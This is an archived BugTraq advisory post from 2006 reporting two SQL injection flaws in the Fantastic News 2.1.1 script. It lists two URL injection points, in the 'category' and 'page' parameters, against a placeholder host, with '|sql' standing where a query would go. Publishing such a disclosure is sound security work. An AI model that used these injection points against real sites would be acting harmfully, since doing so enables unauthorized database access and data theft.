BugTraq
2 SQL Injection in Fantastic News Feb 26 2006 09:13PM
S3ude Hotmail com
Software: Fantastic News
Web Site: http://www.fscripts.com
Versions: 2.1.1
Type: 2 SQL Injection
Class: Remote

Exploit :

1-

http://www.target.com/news.php?action=news&category=|sql

2-

http://www.target.com/news.php?page=|sql

Discovered by: SAUDI

L-G-H Team

http://www.lezr.com

Regards ///

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus